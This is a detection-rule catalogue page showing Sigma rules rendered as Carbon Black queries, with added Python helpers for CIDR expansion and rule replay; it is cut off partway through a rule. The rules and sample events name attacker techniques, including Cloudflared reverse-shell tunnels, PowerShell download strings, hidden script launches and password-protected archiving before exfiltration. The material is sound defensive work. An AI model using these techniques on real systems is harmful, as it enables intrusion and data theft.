Tool
EDR / XDR

VMware Carbon Black

1,440 rules · Sigma detections in VMware Carbon Black syntax
The same Sigma detection corpus, machine-rendered into VMware Carbon Black query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.
Download all 3,646 rules (.zip, 1.2 MB): every VMware Carbon Black query in this view, packaged to deploy.
Filter by technique (pick techniques from the ATT&CK matrix); counts per tactic column:
Reconnaissance: 12
Resource Development: 10
Initial Access: 10
Execution: 30
Persistence: 42
Privilege Escalation: 20
Stealth: 79
Defense Impairment: 32
Credential Access: 35
Discovery: 33
Lateral Movement: 16
Collection: 20
Command and Control: 24
Exfiltration: 10
Impact: 18
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
Judge. Each rule shows a quality tier (Strong / Moderate / Basic) and an estimated alert-volume tier (Low / Medium / High FP), both scored deterministically from the rule's shape - status, detection depth, match breadth, log source, documented false positives and references. A rule existing is not the same as a rule being good, or being quiet; hover either tier for the breakdown. The FP estimate reads rule shape, not a measured rate, so use it to pick what to tune first before you deploy.

Detection rules

50 shown of 1,440
Cloudflared Tunnel Execution
Level: medium · Quality: Strong · Alert volume: High FP
Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.
Status: test · Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: technique · Rule ID: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4
Carbon Black query:
(CommandLine:\ tunnel\ * CommandLine:\ run\ *) (CommandLine:\-config\ * OR CommandLine:\-credentials\-contents\ * OR CommandLine:\-credentials\-file\ * OR CommandLine:\-token\ *)
Sigma YAML:
title: Cloudflared Tunnel Execution
id: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4
status: test
description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.
references:
    - https://blog.reconinfosec.com/emergence-of-akira-ransomware-group
    - https://github.com/cloudflare/cloudflared
    - https://developers.cloudflare.com/cloudflare-one/connections/connect-apps
author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-17
modified: 2023-12-20
tags:
    - attack.command-and-control
    - attack.t1102
    - attack.t1090
    - attack.t1572
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - ' tunnel '
            - ' run '
        CommandLine|contains:
            - '-config '
            - '-credentials-contents '
            - '-credentials-file '
            - '-token '
    condition: selection
falsepositives:
    - Legitimate usage of Cloudflared tunnel.
level: medium
Cloudflared Tunnels Related DNS Requests
Level: medium · Quality: Moderate · Alert volume: High FP
Detects DNS requests to Cloudflared tunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Status: test · Author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: sub-technique · Rule ID: a1d9eec5-33b2-4177-8d24-27fe754d0812
Carbon Black query:
QueryName:.v2.argotunnel.com OR QueryName:protocol\-v2.argotunnel.com OR QueryName:trycloudflare.com OR QueryName:update.argotunnel.com
Sigma YAML:
title: Cloudflared Tunnels Related DNS Requests
id: a1d9eec5-33b2-4177-8d24-27fe754d0812
related:
    - id: 7cd1dcdc-6edf-4896-86dc-d1f19ad64903
      type: similar
status: test
description: |
    Detects DNS requests to Cloudflared tunnels domains.
    Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
references:
    - https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/
    - Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-12-20
tags:
    - attack.command-and-control
    - attack.t1071.001
    - attack.t1572
logsource:
    category: dns_query
    product: windows
detection:
    selection:
        QueryName|endswith:
            - '.v2.argotunnel.com'
            - 'protocol-v2.argotunnel.com'
            - 'trycloudflare.com'
            - 'update.argotunnel.com'
    condition: selection
falsepositives:
    - Legitimate use of cloudflare tunnels will also trigger this.
level: medium
Cmd Launched with Hidden Start Flags to Suspicious Targets
Level: medium · Quality: Strong · Alert volume: Medium FP
Detects cmd.exe executing commands with the "start" utility using "/b" (no window) or "/min" (minimized) flags. To reduce false positives from standard background tasks, detection is restricted to scenarios where the target is a known script extension or located in suspicious temporary/public directories. This technique was observed in Chaos, DarkSide, and Emotet malware campaigns.
Status: experimental · Author: Vladan Sekulic, Swachchhanda Shrawan Poudel (Nextron Systems) · ATT&CK mapping: sub-technique · Rule ID: 5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d
Carbon Black query:
((Image:\\cmd.exe OR OriginalFileName:Cmd.Exe) (CommandLine:start\ * OR CommandLine:start\/b* OR CommandLine:start\/min*) (CommandLine:\-b\ * OR CommandLine:\/b\ * OR CommandLine:–b\ * OR CommandLine:—b\ * OR CommandLine:―b\ * OR CommandLine:\-b\"* OR CommandLine:\/b\"* OR CommandLine:–b\"* OR CommandLine:—b\"* OR CommandLine:―b\"* OR CommandLine:\-min\ * OR CommandLine:\/min\ * OR CommandLine:–min\ * OR CommandLine:—min\ * OR CommandLine:―min\ * OR CommandLine:\-min\"* OR CommandLine:\/min\"* OR CommandLine:–min\"* OR CommandLine:—min\"* OR CommandLine:―min\"*)) ((CommandLine:\:\\Perflogs\\* OR CommandLine:\:\\Temp\\* OR CommandLine:\:\\Users\\Default\\* OR CommandLine:\:\\Windows\\Temp\\* OR CommandLine:\\AppData\\Roaming\\* OR CommandLine:\\Contacts\\* OR CommandLine:\\Documents\\* OR CommandLine:\\Downloads\\* OR CommandLine:\\Favorites\\* OR CommandLine:\\Favourites\\* OR CommandLine:\\inetpub\\* OR CommandLine:\\Music\\* OR CommandLine:\\Photos\\* OR CommandLine:\\Temporary\ Internet\\* OR CommandLine:\\Users\\Public\\* OR CommandLine:\\Videos\\*) OR (CommandLine:.bat* OR CommandLine:.cmd* OR CommandLine:.cpl* OR CommandLine:.hta* OR CommandLine:.js* OR CommandLine:.ps1* OR CommandLine:.scr* OR CommandLine:.vbe* OR CommandLine:.vbs*) OR (CommandLine:\ \-nop\ * OR CommandLine:\ \-sta\ * OR CommandLine:.downloadfile\(* OR CommandLine:.downloadstring\(* OR CommandLine:\-noni\ * OR CommandLine:\-w\ hidden\ *))
Sigma YAML:
title: Cmd Launched with Hidden Start Flags to Suspicious Targets
id: 5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d
status: experimental
description: |
    Detects cmd.exe executing commands with the "start" utility using "/b" (no window) or "/min" (minimized) flags.
    To reduce false positives from standard background tasks, detection is restricted to scenarios where the target is a known script extension or located in suspicious temporary/public directories.
    This technique was observed in Chaos, DarkSide, and Emotet malware campaigns.
references:
    - https://www.fortinet.com/blog/threat-research/evolution-of-chaos-ransomware-faster-smarter-and-more-dangerous
    - https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions
    - https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/start
tags:
    - attack.stealth
    - attack.t1564.003
author: Vladan Sekulic, Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-01-24
logsource:
    category: process_creation
    product: windows
detection:
    selection_cmd_img:
        - Image|endswith: '\cmd.exe'
        - OriginalFileName: 'Cmd.Exe'
    selection_cmd_hidden_start_1:
        CommandLine|contains|windash:
            - 'start '
            - 'start/b'
            - 'start/min'
    selection_cmd_hidden_start_2:
        CommandLine|contains|windash:
            - '/b '
            - '/b"'
            - '/min '
            - '/min"'
    selection_cli_uncommon_location:
        CommandLine|contains:
            - ':\Perflogs\'
            - ':\Temp\'
            - ':\Users\Default\'
            - ':\Windows\Temp\'
            - '\AppData\Roaming\'
            - '\Contacts\'
            - '\Documents\'
            - '\Downloads\'
            - '\Favorites\'
            - '\Favourites\'
            - '\inetpub\'
            - '\Music\'
            - '\Photos\'
            - '\Temporary Internet\'
            - '\Users\Public\'
            - '\Videos\'
    selection_cli_susp_extension:
        CommandLine|contains:
            - '.bat'
            - '.cmd'
            - '.cpl'
            - '.hta'
            - '.js'
            - '.ps1'
            - '.scr'
            - '.vbe'
            - '.vbs'
    selection_cli_susp_pattern:
        CommandLine|contains:
            - ' -nop '
            - ' -sta '
            - '.downloadfile(' # PowerShell download command
            - '.downloadstring(' # PowerShell download command
            - '-noni '
            - '-w hidden '
    condition: all of selection_cmd_* and 1 of selection_cli_*
falsepositives:
    - Legitimate administrative scripts running from temporary folders.
    - Niche software updaters utilizing hidden batch files in ProgramData.
level: medium # Can be increased after an initial baseline and tuning
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag/info.yml
Code Execution via Pcwutl.dll
Level: medium · Quality: Moderate · Alert volume: High FP
Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.
Status: test · Author: Julia Fomina, oscd.community · ATT&CK mapping: sub-technique · Rule ID: 9386d78a-7207-4048-9c9f-a93a7c2d1c05
Carbon Black query:
(Image:\\rundll32.exe OR OriginalFileName:RUNDLL32.EXE) (CommandLine:pcwutl* CommandLine:LaunchApplication*)
Sigma YAML:
title: Code Execution via Pcwutl.dll
id: 9386d78a-7207-4048-9c9f-a93a7c2d1c05
status: test
description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.
references:
    - https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/
    - https://twitter.com/harr0ey/status/989617817849876488
author: Julia Fomina, oscd.community
date: 2020-10-05
modified: 2023-02-09
tags:
    - attack.stealth
    - attack.t1218.011
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\rundll32.exe'
        - OriginalFileName: 'RUNDLL32.EXE'
    selection_cli:
        CommandLine|contains|all:
            - 'pcwutl'
            - 'LaunchApplication'
    condition: all of selection_*
falsepositives:
    - Use of Program Compatibility Troubleshooter Helper
level: medium
CodePage Modification Via MODE.COM To Russian Language
Level: medium · Quality: Strong · Alert volume: High FP
Detects a CodePage modification using the "mode.com" utility to Russian language. This behavior has been used by threat actors behind Dharma ransomware.
Status: test · Author: Joseliyo Sanchez, @Joseliyo_Jstnk · ATT&CK mapping: technique · Rule ID: 12fbff88-16b5-4b42-9754-cd001a789fb3
Carbon Black query:
(Image:\\mode.com OR OriginalFileName:MODE.COM) ((CommandLine:\ con\ * CommandLine:\ cp\ * CommandLine:\ select=*) (CommandLine:=1251 OR CommandLine:=866))
Sigma YAML:
title: CodePage Modification Via MODE.COM To Russian Language
id: 12fbff88-16b5-4b42-9754-cd001a789fb3
related:
    - id: d48c5ffa-3b02-4c0f-9a9e-3c275650dd0e
      type: derived
status: test
description: |
    Detects a CodePage modification using the "mode.com" utility to Russian language.
    This behavior has been used by threat actors behind Dharma ransomware.
references:
    - https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode
    - https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html
    - https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2024-01-17
tags:
    - attack.stealth
    - attack.t1036
logsource:
    category: process_creation
    product: windows
detection:
    # VT Query: behavior:"mode con cp select=1251"
    # VT Query: behavior:"mode con cp select=866"
    selection_img:
        - Image|endswith: '\mode.com'
        - OriginalFileName: 'MODE.COM'
    selection_cli:
        CommandLine|contains|all:
            - ' con '
            - ' cp '
            - ' select='
        CommandLine|endswith:
            - '=1251' # ANSI Cyrillic; Cyrillic (Windows) - Observed ITW by Dharma ransomware
            - '=866' # OEM Russian; Cyrillic (DOS) - Observed ITW by other malware
    condition: all of selection_*
falsepositives:
    - Russian speaking people changing the CodePage
level: medium
Command Line Execution with Suspicious URL and AppData Strings
Level: medium · Quality: Moderate · Alert volume: High FP
Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
Status: test · Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community · ATT&CK mapping: sub-technique · Rule ID: 1ac8666b-046f-4201-8aba-1951aaec03a3
Carbon Black query:
Image:\\cmd.exe (CommandLine:http* CommandLine:\:\/\/* CommandLine:%AppData%*)
Sigma YAML:
title: Command Line Execution with Suspicious URL and AppData Strings
id: 1ac8666b-046f-4201-8aba-1951aaec03a3
status: test
description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
references:
    - https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100
    - https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100
author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
date: 2019-01-16
modified: 2021-11-27
tags:
    - attack.execution
    - attack.command-and-control
    - attack.t1059.003
    - attack.t1059.001
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\cmd.exe'
        CommandLine|contains|all:
            - 'http' # captures both http and https
            - '://'
            - '%AppData%'
    condition: selection
falsepositives:
    - High
level: medium
Communication To Uncommon Destination Ports
Level: medium · Quality: Moderate · Alert volume: Medium FP
Detects programs that connect to uncommon destination ports
Status: test · Author: Florian Roth (Nextron Systems) · ATT&CK mapping: technique · Rule ID: 6d8c3d20-a5e1-494f-8412-4571d716cf5c
Carbon Black query:
(Initiated:true (DestinationPort:8080 OR DestinationPort:8888)) (-(DestinationIp:127.* OR DestinationIp:10.* OR DestinationIp:172.16.* OR DestinationIp:172.17.* OR DestinationIp:172.18.* OR DestinationIp:172.19.* OR DestinationIp:172.20.* OR DestinationIp:172.21.* OR DestinationIp:172.22.* OR DestinationIp:172.23.* OR DestinationIp:172.24.* OR DestinationIp:172.25.* OR DestinationIp:172.26.* OR DestinationIp:172.27.* OR DestinationIp:172.28.* OR DestinationIp:172.29.* OR DestinationIp:172.30.* OR DestinationIp:172.31.* OR DestinationIp:192.168.* OR DestinationIp:169.254.* OR DestinationIp:\:\:1 OR DestinationIp:fe8* OR DestinationIp:fe9* OR DestinationIp:fea* OR DestinationIp:feb* OR DestinationIp:fc* OR DestinationIp:fd*)) (-(Image:C\:\\Program\ Files\\* OR Image:C\:\\Program\ Files\ \(x86\)\\*))
Sigma YAML:
title: Communication To Uncommon Destination Ports
id: 6d8c3d20-a5e1-494f-8412-4571d716cf5c
related:
    - id: 4b89abaa-99fe-4232-afdd-8f9aa4d20382
      type: similar
status: test
description: Detects programs that connect to uncommon destination ports
references:
    - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
author: Florian Roth (Nextron Systems)
date: 2017-03-19
modified: 2024-03-12
tags:
    - attack.persistence
    - attack.command-and-control
    - attack.t1571
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        DestinationPort:
            - 8080
            - 8888
    filter_main_local_ranges:
        DestinationIp|cidr:
            - '127.0.0.0/8'
            - '10.0.0.0/8'
            - '172.16.0.0/12'
            - '192.168.0.0/16'
            - '169.254.0.0/16'
            - '::1/128'  # IPv6 loopback
            - 'fe80::/10'  # IPv6 link-local addresses
            - 'fc00::/7'  # IPv6 private addresses
    filter_optional_sys_directories:
        Image|startswith:
            - 'C:\Program Files\'
            - 'C:\Program Files (x86)\'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: medium
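The `filter_main_local_ranges` block above uses Sigma's `cidr` modifier, which the rendered Carbon Black query spells out as wildcard prefixes (`172.16.*` through `172.31.*`, `fe8*`, `fc*`, and so on). The following added example, which is not code from the page, from SigmaHQ or from pySigma, reproduces that expansion for any prefix length using only the standard `ipaddress` module and then compares it against the exact network test on constructed sample addresses, which is how you find the cases where a textual wildcard is not equivalent to a CIDR check. The network list and the sample addresses are assumptions made for the example.

```python
"""Expand a Sigma `cidr` value into the wildcard prefixes a query language without
native CIDR matching has to use (the query above spells 172.16.0.0/12 out as
sixteen 172.N.* terms), then check the expansion against the exact ipaddress
test.  Added example: not part of the page, of SigmaHQ or of pySigma."""
import fnmatch
import ipaddress

def cidr_to_wildcards(cidr):
    """Return glob prefixes whose union is exactly the network."""
    net = ipaddress.ip_network(cidr, strict=False)
    if net.prefixlen == net.max_prefixlen:  # single host, e.g. ::1/128 -> "::1"
        return [str(net.network_address)]
    if net.version == 4:
        # A glob can only cut on an octet: round the prefix length up to the next
        # multiple of 8 and enumerate every subnet at that boundary.
        bits = -(-net.prefixlen // 8) * 8
        return [".".join(str(s.network_address).split(".")[: bits // 8]) + ".*"
                for s in net.subnets(new_prefix=bits)]
    # IPv6: cut on a hex digit (4 bits) of the fully expanded, zero-padded form.
    bits = -(-net.prefixlen // 4) * 4
    globs = []
    for s in net.subnets(new_prefix=bits):
        digits = s.network_address.exploded.replace(":", "")[: bits // 4]
        # put ':' back after every complete 16-bit group so the glob lines up with
        # the written address (fe80::/10 -> fe8*, 2001:db8::/32 -> 2001:0db8*)
        globs.append(":".join(digits[i:i + 4] for i in range(0, len(digits), 4)) + "*")
    return globs

def glob_match(ip, globs):
    """The plain string test a wildcard query applies: case-sensitive, no parsing."""
    return any(fnmatch.fnmatchcase(ip, g) for g in globs)

# The networks listed under filter_main_local_ranges in the rule above.
LOCAL_RANGES = ["127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                "169.254.0.0/16", "::1/128", "fe80::/10", "fc00::/7"]

def compare(cidrs, ips):
    """For each address string return (exact CIDR result, wildcard result)."""
    nets = [ipaddress.ip_network(c, strict=False) for c in cidrs]
    globs = [g for c in cidrs for g in cidr_to_wildcards(c)]
    out = {}
    for ip in ips:
        addr = ipaddress.ip_address(ip)
        out[ip] = (any(addr in n for n in nets), glob_match(ip, globs))
    return out

# Constructed sample destinations, not captured telemetry.
SAMPLE_IPS = ["172.31.255.254", "172.32.0.1", "10.9.8.7", "203.0.113.5",
              "fe80::1", "fd12:3456::1", "::1", "2001:db8::1", "FE80::1"]
```

Two mismatches show up as soon as `compare(LOCAL_RANGES, SAMPLE_IPS)` runs: the wildcard test is case-sensitive, so `FE80::1` written in upper case slips past `fe8*` even though it is link-local, and any IPv6 prefix longer than one 16-bit group only matches the expanded zero-padded form (`2001:0db8*` never matches `2001:db8::1`). When the sensor does not guarantee a canonical textual form, normalise addresses with `ipaddress.ip_address` before the filter or keep the CIDR test on the SIEM side rather than trusting the rendered wildcards.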
Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788)
Level: medium · Quality: Moderate · Alert volume: High FP
Detects a qlogin.exe command attempting to authenticate as the internal `_+_PublicSharingUser_` using a GUID as the password. This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials.
Status: experimental · Author: Swachchhanda Shrawan Poudel (Nextron Systems) · ATT&CK mapping: sub-technique · Rule ID: 917789e1-2c1f-4bf5-8c91-6f71a017f469
Carbon Black query:
(CommandLine:qlogin* CommandLine:_\+_PublicSharingUser_*) CommandLine:[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}
Sigma YAML:
title: Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788)
id: 917789e1-2c1f-4bf5-8c91-6f71a017f469
status: experimental
description: |
    Detects a qlogin.exe command attempting to authenticate as the internal `_+_PublicSharingUser_` using a GUID as the password.
    This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials.
references:
    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-10-20
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.initial-access
    - attack.stealth
    - attack.t1078.001
    - detection.emerging-threats
    - cve.2025-57788
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'qlogin'
            - '_+_PublicSharingUser_'
        # Detects the use of a GUID as the password, which is indicative of an exploit attempt
        CommandLine|re: '[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}'
    condition: selection
falsepositives:
    - Legitimate administrative scripts that use the `_+_PublicSharingUser_` account for valid purposes.
level: medium
Compress Data and Lock With Password for Exfiltration With 7-ZIP
Level: medium · Quality: Strong · Alert volume: Medium FP
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
Status: test · Author: frack113 · ATT&CK mapping: sub-technique · Rule ID: 9fbf5927-5261-4284-a71d-f681029ea574
Carbon Black query:
(Description:7\-Zip* OR (Image:\\7z.exe OR Image:\\7zr.exe OR Image:\\7za.exe) OR (OriginalFileName:7z.exe OR OriginalFileName:7za.exe OR OriginalFileName:7zr.exe)) CommandLine:\ \-p* (CommandLine:\ a\ * OR CommandLine:\ u\ *)
Sigma YAML:
title: Compress Data and Lock With Password for Exfiltration With 7-ZIP
id: 9fbf5927-5261-4284-a71d-f681029ea574
status: test
description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
author: frack113
date: 2021-07-27
modified: 2026-06-05
tags:
    - attack.collection
    - attack.t1560.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Description|contains: '7-Zip'
        - Image|endswith:
              - '\7z.exe'
              - '\7zr.exe'
              - '\7za.exe'
        - OriginalFileName:
              - '7z.exe'
              - '7za.exe'
              - '7zr.exe'
    selection_password:
        CommandLine|contains: ' -p'
    selection_action:
        CommandLine|contains:
            - ' a '
            - ' u '
    condition: all of selection_*
falsepositives:
    - Legitimate activity is expected since compressing files with a password is common.
level: medium
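The Adapt and Validate steps at the top of this page, applied to this 7-Zip rule: the following is an added example, not code from the page, from SigmaHQ or from Carbon Black, of a small Sigma evaluator that maps Sigma field names onto a sensor schema and replays the rule over constructed events before the query is trusted. The schema names on the right of `FIELD_MAP`, the sample events and the dictionary form of the rule's `detection` section are all assumptions made here. The same evaluator also covers the `windash` expansion seen in the cmd.exe rule and the `re` modifier of the Commvault rule, whose rendered Carbon Black query carries the regular expression verbatim.

```python
"""Minimal evaluator for a Sigma `detection` section: map the Sigma field names
onto the schema your sensor really emits, then replay the rule over sample events.
Added example, not page or SigmaHQ code; the names on the right of FIELD_MAP are
assumptions, not Carbon Black's actual field names."""
import fnmatch
import re

FIELD_MAP = {  # Sigma field -> field in the hypothetical EDR event schema
    "Image": "process_path", "OriginalFileName": "process_original_filename",
    "Description": "process_file_description", "CommandLine": "process_cmdline",
}
DASHES = ["-", "/", "\u2013", "\u2014", "\u2015"]  # what |windash expands a dash to

def value_matches(actual, expected, mods):
    """Sigma string matching is case-insensitive; `re` is the one exception."""
    if "re" in mods:
        return re.search(expected, str(actual)) is not None
    actual, variants = str(actual).lower(), [expected]
    if "windash" in mods:  # first dash only; the windash values on this page have one
        m = re.search(r"[-/]", expected)
        variants = [expected[:m.start()] + d + expected[m.end():] for d in DASHES] if m else variants
    for v in map(str.lower, variants):
        if ("contains" in mods and v in actual) or ("startswith" in mods and actual.startswith(v)) \
           or ("endswith" in mods and actual.endswith(v)) \
           or (not {"contains", "startswith", "endswith"} & set(mods) and fnmatch.fnmatchcase(actual, v)):
            return True  # plain values may carry Sigma's * and ? wildcards
    return False

def field_matches(event, spec, expected):
    field, *mods = spec.split("|")
    actual = event.get(FIELD_MAP.get(field, field))  # unmapped names pass through
    if actual is None:
        return False
    values = expected if isinstance(expected, list) else [expected]
    combine = all if "all" in mods else any  # a value list is OR unless |all is present
    return combine(value_matches(actual, v, mods) for v in values)

def selection_matches(event, body):
    """A map is an AND over its fields; a list of maps is an OR over the maps."""
    if isinstance(body, list):
        return any(selection_matches(event, b) for b in body)
    return all(field_matches(event, k, v) for k, v in body.items())

def evaluate_condition(cond, results):
    """Recursive-descent parser for the condition grammar used by the rules on this
    page: names, `N of prefix*`, `all of prefix*`, `them`, not/and/or, parentheses."""
    toks = re.findall(r"\(|\)|[^\s()]+", cond)
    peek = lambda: toks[0] if toks else None
    def atom():
        t = toks.pop(0)
        if t == "(":
            v = expr_or()
            toks.pop(0)  # the closing ')'
            return v
        if t == "all" or t.isdigit():
            toks.pop(0)  # 'of'
            pat = toks.pop(0)
            hits = [h for n, h in results.items() if pat == "them" or fnmatch.fnmatchcase(n, pat)]
            return all(hits) if t == "all" else sum(hits) >= int(t)
        return results[t]
    def expr_not():
        if peek() == "not":
            toks.pop(0)
            return not expr_not()
        return atom()
    def chain(sub, op, fold):  # left-assoc operator; sub() always runs, so its tokens are consumed
        v = sub()
        while peek() == op:
            toks.pop(0)
            v = fold(v, sub())
        return v
    expr_and = lambda: chain(expr_not, "and", lambda a, b: a and b)
    expr_or = lambda: chain(expr_and, "or", lambda a, b: a or b)
    return expr_or()

def rule_matches(detection, event):
    results = {n: selection_matches(event, b) for n, b in detection.items() if n != "condition"}
    return evaluate_condition(detection["condition"], results)

SEVEN_ZIP = {  # the detection section of the 7-Zip rule above, as a Python dict
    "selection_img": [{"Description|contains": "7-Zip"},
                      {"Image|endswith": ["\\7z.exe", "\\7zr.exe", "\\7za.exe"]},
                      {"OriginalFileName": ["7z.exe", "7za.exe", "7zr.exe"]}],
    "selection_password": {"CommandLine|contains": " -p"},
    "selection_action": {"CommandLine|contains": [" a ", " u "]},
    "condition": "all of selection_*",
}
EVENTS = {  # constructed sample events in the hypothetical schema, not real telemetry
    "staging": {"process_path": "C:\\Tools\\7za.exe",
                "process_cmdline": "7za.exe a -pS3cret! -mhe=on C:\\Users\\Public\\o.7z C:\\Users\\bob\\Documents"},
    "listing": {"process_path": "C:\\Program Files\\7-Zip\\7z.exe", "process_cmdline": "7z.exe l backup.7z"},
    "renamed": {"process_path": "C:\\Windows\\Temp\\svc.exe", "process_original_filename": "7z.exe",
                "process_cmdline": "svc.exe u -p1234 x.7z *.docx"},
}

def replay(detection=SEVEN_ZIP, events=EVENTS):
    """Return {event name: rule fired?} over every sample event."""
    return {name: rule_matches(detection, ev) for name, ev in events.items()}
```

`replay()` fires on the password-protected archive and on the renamed binary (caught through `OriginalFileName`, which is why the rule carries that alternative) and stays quiet on a plain listing. Replaying a rule this way is also the cheapest way to notice that a rendered query dropped a modifier: the Commvault query above copies the `re` value as if it were a plain search term, and a second pass over the search results with `value_matches(cmdline, pattern, ["re"])` restores the GUID check. Sigma value escaping (`\*` for a literal asterisk) and the full `windash` permutation of values with several dashes are not implemented.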
Compress Data and Lock With Password for Exfiltration With WINZIP
Level: medium · Quality: Moderate · Alert volume: Medium FP
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
Status: test · Author: frack113 · ATT&CK mapping: sub-technique · Rule ID: e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d
Carbon Black query:
(CommandLine:winzip.exe* OR CommandLine:winzip64.exe*) CommandLine:\-s\"* (CommandLine:\ \-min\ * OR CommandLine:\ \-a\ *)
Sigma YAML:
title: Compress Data and Lock With Password for Exfiltration With WINZIP
id: e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d
status: test
description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
author: frack113
date: 2021-07-27
modified: 2022-12-25
tags:
    - attack.collection
    - attack.t1560.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_winzip:
        CommandLine|contains:
            - 'winzip.exe'
            - 'winzip64.exe'
    selection_password:
        CommandLine|contains: '-s"'
    selection_other:
        CommandLine|contains:
            - ' -min '
            - ' -a '
    condition: all of selection*
falsepositives:
    - Unknown
level: medium
Computer Discovery And Export Via Get-ADComputer Cmdlet
Level: medium · Quality: Strong · Alert volume: High FP
Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
Status: test · Author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: technique · Rule ID: 435e10e4-992a-4281-96f3-38b11106adde
Carbon Black query:
((Image:\\powershell.exe OR Image:\\pwsh.exe) OR (OriginalFileName:PowerShell.EXE OR OriginalFileName:pwsh.dll)) ((CommandLine:Get\-ADComputer\ * CommandLine:\ \-Filter\ \**) (CommandLine:\ >\ * OR CommandLine:\ |\ Select\ * OR CommandLine:Out\-File* OR CommandLine:Set\-Content* OR CommandLine:Add\-Content*))
Sigma YAML:
title: Computer Discovery And Export Via Get-ADComputer Cmdlet
id: 435e10e4-992a-4281-96f3-38b11106adde
related:
    - id: db885529-903f-4c5d-9864-28fe199e6370
      type: similar
status: test
description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
references:
    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
    - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
    - https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-11-10
